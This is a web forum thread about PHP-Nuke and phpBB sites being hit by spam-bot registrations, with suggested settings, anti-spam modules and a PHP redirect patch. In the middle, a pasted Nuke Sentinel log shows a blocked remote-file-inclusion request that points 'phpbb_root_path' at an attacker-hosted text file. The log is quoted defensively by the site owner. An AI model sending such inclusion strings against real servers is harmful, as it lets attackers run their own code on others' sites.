Help- Need Admin Approval Of Registration for Users

Digital-Overload · Hangin' Around Joined: May 13, 2005 Posts: 26

Ok, Im Having Tons of Problems with Spam Bots, and i cant fit all the specs in the subject space so,

PHP-Nuke 7.5 Or 7.6, cant be sure which one i uploaded,
phpbb 2.0.10
Nuke Sentinel Secuirity

ok my problem, recently spam bots have been hitting the guestbook, which was disabled, and now they've moved to the Forums,

I've logged in and deleted spam messages for random drugs and sites, deleted the Account, and Banned the IP for spam, but they keep coming about 10 times a day,

Recently I Logged in, went to My PHP-Nuke Admin Section, clicked forums, and clicked on Configuration on the PHPBB Admin Index, and selected "Admin" bullet under "Enable Account Activation"

Problem Is, My Admin Email never recieves any approval notices, and users are still registering,

so, why isnt the registrations requiring Admin Approval?
Does PHP-Nuke Registration Module Not USe the Forums settings?

is there a way i can set nuke to require an admin approval,

it seems registering from the your_account module doesnot require the admin approval that was set in the forums user registration section, and i cant find the option in the PHP-Nuke Configuration panel anywhere,

So is there a setting? or is there a module I can use that will be easy to install and co-exist with the Sentinel Secuirity

srhh · Involved Joined: Dec 27, 2005 Posts: 296

HI,

Well, you can avoid the whole admin approval thing if you make your forums view only and disable anonymous posting.
Anyways, the phpbb thing didn't work because that is a different setting and users do not sign up for accounts through phpbb, they go through the Your_Account module.
Which leads me into the next, thing, CNBYA is an advanced Your_Account module and has the ability for admins to approve registration among lots of other things.
But, I think you should be able to at least make new users verify their e-mail address in the standard YourAccount, which iwll stop those spam accounts.

Digital-Overload · Hangin' Around Joined: May 13, 2005 Posts: 26

right now only registered users can post on my forums, but the spam bots register alot...

When Registering thru Your_Account, the site still requires the user to verify email, oddly enough, my admin email for the site also gets "Failed Delivery" emails for the spambots accounts, yet they are still able to post without verifying the account?

The Forums Configuration Section was recently on "none" for approval, and i did move it to admin, so if they ARE useing the forums module to register, then hopefully i can stop it, but i think they are using the Your_Accounts module...

srhh · Involved Joined: Dec 27, 2005 Posts: 296

Hmm, that's weird. To think of it, I've had the same issue here and there with bots signing up and bypassing the email check, and I'm using CNBYA, but they haven't posted in the forums. I was getting ALOT of spammers trying to post that I saw in my Sentinel logs not to mention viscious bots just draining bandwidth, so I just installed Guardian's SpamStopper yesterday which should hopefully do the trick. Itc checks for bad refferers and keywords like viagra to deny the bot access and/or ban it. Still trying to get it set up, but you can get it here:

Only registered users can see links on this board!
Get registered or login to the forums!

Otherwise, I'll leave this thread to the experts!

evaders99 · Posted: Thu Sep 21, 2006 6:05 pm

My guess is that the old version of phpBB is being exploited, may need to get your system up to BBToNuke 2.0.21

Guardian2003 · Posted: Thu Sep 21, 2006 6:05 pm

Make sure you nuke is using the latest patches.
Double check your forum settings in Admin ->Forums ->Permission ->'advanced mode' to make sure post, reply and quote are set to registered only.
If they are only spamming one or two specific forums I suspect this is the reason - some of the forums are set to allow anonymous posting.

Make sure on you main nuke settings that 'allow email changes' is set to NO and allow username changes is also set to NO.

Digital-Overload · Hangin' Around Joined: May 13, 2005 Posts: 26

The Forums are all locked to Registered only for Posting,

they seem to be explioting the phpbb Registration Module (forums.html&file=profile&mode=register), Becaue during the last 5 hours 2 more bots registered, but i noticed they didnt post anything, which is unusual, sure enough i check my admin email and both accounts were awaiting approval (even though i deleted from a remote location before checking my admin mail)

Before the Setting for the Forums Enable User Activation was set to either None/User, I recently CHanged it to Admin a few minutes before posting my first post in this topic.

So, They Seem to Be using the Forums themselves to register before posting, and since they are registering using the forums module and not the Your_Account module, the forums settings are forcing them to wait for my approval which they wont get,

Oh,
they are always Spamming my "General Discussion forum" (or Forumid=1), Which is Set to Guest are only allowed to View, and to Post / Reply you have to be Registered,

So it seems for now they are blocked from posting (seeing the forums module requires admin approval to activate their accounts)

Its Odd,
I've ALso been Getting Hits by Random People trying to access the forums admin section with wierd strings, and yes, the Wonderful Sentinel Program Catches them and bans them appropriatly,

Coming From random IPs, What Exaclty are thes e people trying to do?
(removed my domain name to avoid problems)

Reason: Abuse-Harvest
String Match: libwww-perl
--------------------
User Agent: libwww-perl/5.805
Query String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php?phpbb_root_path=http://mirckurdu.net/images/lol.txt?
Get String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php?phpbb_root_path=http://mirckurdu.net/images/lol.txt?
Post String:
<websiteremoved>/PHP/modules/Forums/admin/admin_users.php
Forwarded For: 202.157.207.241
Client IP: none
Remote Address: 202.157.192.162
Remote Port: none
Request Method: GET

Guardian2003 · Posted: Fri Sep 22, 2006 12:21 am

This script kiddie has been attacking my site for the last couple of weeks so I'm familiar with this one.
You did not mention forum 'quote' permissions - you may want to re-check those Smile

And I forgot to mention turning on the security graphic in config.php Smile

You could also set up a redirect in htaccess so that anyone trying to hit the 'register' forum link gets redirected to the YA register page.

Digital-Overload · Hangin' Around Joined: May 13, 2005 Posts: 26

Well, for now they can attempt to register, but the Forum is requiring them to wait for my approval, so they cant post,

for permissions, everything is set to REG, except teh edit/delete/mod stuff,

the only thing unregistered viewers can do is read..

So For now the Situation is contained,

Guardian2003 · Posted: Fri Sep 22, 2006 7:59 am

Excellent news!

evaders99 · Posted: Fri Sep 22, 2006 8:08 am

Personally I just disable the forums registration completely

Code:

in includes/usercp_register.php

FIND

if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
exit;
}

AFTER, ADD

if ($mode == "register") {
Header("Location: modules.php?name=Your_Account&op=new_user");
die();
}

thebishop · Posted: Fri Oct 23, 2009 2:48 pm

evaders99 wrote:

Personally I just disable the forums registration completely

Code:

in includes/usercp_register.php

FIND

if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
exit;
}

AFTER, ADD

if ($mode == "register") {
Header("Location: modules.php?name=Your_Account&op=new_user");
die();
}

I added that code to the 'usercp_register.php' file but clients are still able to register using the registration link in the forums.

I have had 4 people register over the last week and no new registrant emails were sent for the site admin to approve the registration, and when i check the site i have four new registered clients showing up in the user info block and in the members list.

I am using the latest approve membership module for account approval. with 7.6 np to 3.3.

slackervaara · Worker Joined: Aug 26, 2007 Posts: 234

I have not had a single spam on my site since I installed bbantispam or Advanced Textual Confirmation more than 2 years ago. The secret is to put the installation code in config.php.

Only registered users can see links on this board!
Get registered or login to the forums!

thebishop · Posted: Sat Oct 24, 2009 3:27 am

slackervaara wrote:

I have not had a single spam on my site since I installed bbantispam or Advanced Textual Confirmation more than 2 years ago. The secret is to put the installation code in config.php.

Only registered users can see links on this board!
Get registered or login to the forums!

Ok i read all about it and i think this should work.
I would still be interested in how evaders code works though.
Thanks slackervaara.